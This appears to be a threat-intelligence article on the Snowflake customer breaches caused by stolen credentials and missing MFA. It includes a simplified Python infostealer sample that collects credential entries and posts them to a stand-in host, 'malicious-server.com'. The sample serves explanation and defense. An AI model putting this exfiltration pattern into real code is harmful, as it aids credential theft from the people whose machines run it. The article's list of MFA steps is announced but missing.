Learn how recent Snowflake breaches exposed millions of records due to weak security measures, emphasizing the critical need for multi-factor authentication (MFA)

Continue reading
Recent security incidents involving Snowflake, a prominent cloud data platform, have raised significant concerns about data security.
These breaches have impacted major companies such as Santander Bank, Ticketmaster, and Advance Auto Parts, exposing critical vulnerabilities in how cloud environments are secured and managed.
This detailed Threatfeed delves into the specifics of these incidents, examines the technical details, and provides insights into how such breaches can be mitigated.
Snowflake is a cloud-based data warehousing service used by numerous global corporations. It offers scalable storage and computational power, allowing organizations to store and analyze large volumes of data efficiently. However, the recent breaches underscore the importance of robust security measures, particularly multi-factor authentication (MFA), in protecting sensitive information.
Snowflake's reputation for handling vast amounts of data for diverse industries was marred by multiple data breaches. Hackers exploited vulnerabilities associated with single-factor authentication, accessing sensitive data from several major clients.
Hackers used credentials obtained through infostealing malware. These credentials were then used to access Snowflake environments that did not enforce MFA. The malware targeted employees' computers, scraping saved passwords and usernames, which were then sold on cybercrime forums.
Ticketmaster's breach involved the theft of over 560 million customer records. The attackers accessed this data by exploiting weaknesses in Snowflake's single-factor authentication setup, which allowed them to bypass security measures.
Advance Auto Parts suffered a breach involving 380 million customer profiles, 140 million customer orders, and sensitive employee information. The stolen data included SSNs, driver's license numbers, and transaction details, highlighting the extensive nature of the breach.
Single-factor authentication relies solely on a username and password, making it vulnerable to breaches if these credentials are compromised. MFA, on the other hand, requires additional verification, such as a one-time code sent to a mobile device, significantly enhancing security.
Snowflake's failure to enforce MFA contributed to these breaches. MFA could have prevented unauthorized access by requiring an additional verification step, making it harder for hackers to use stolen credentials.
Implementing MFA involves several steps:
Infostealing malware is designed to scrape and exfiltrate credentials stored on a user's computer. It typically targets browsers and other applications where passwords are saved.
Here is a simplified instance of how infostealing malware might operate:
import requests
from browser_history import get_history
def scrape_credentials():
# Extract browser history
history = get_history()
credentials = []
for site in history:
if 'login' in site:
# Simulate credential scraping
credentials.append({
'url': site,
'username': 'extracted_user',
'password': 'extracted_pass'
})
return credentials
def send_to_server(data):
server_url = 'http://malicious-server.com/upload'
requests.post(server_url, json=data)
if __name__ == "__main__":
creds = scrape_credentials()
send_to_server(creds)This script demonstrates how malware could scrape browser history and send extracted credentials to a remote server.
Organizations using Snowflake should enforce MFA across all accounts. This can be mandated through policy changes and regular audits to ensure compliance.
Conducting regular security audits can help identify vulnerabilities and ensure that all security measures, including MFA, are properly implemented and functioning.
Employees should be trained on cybersecurity best practices, including the importance of using strong, unique passwords and recognizing phishing attempts that could lead to malware infections.

A third-party software flaw inside one of Japan's largest telcos exposed login credentials for up to 14.2 million email accounts across six ISPs. The passwords? Some were hashed. Some may not have been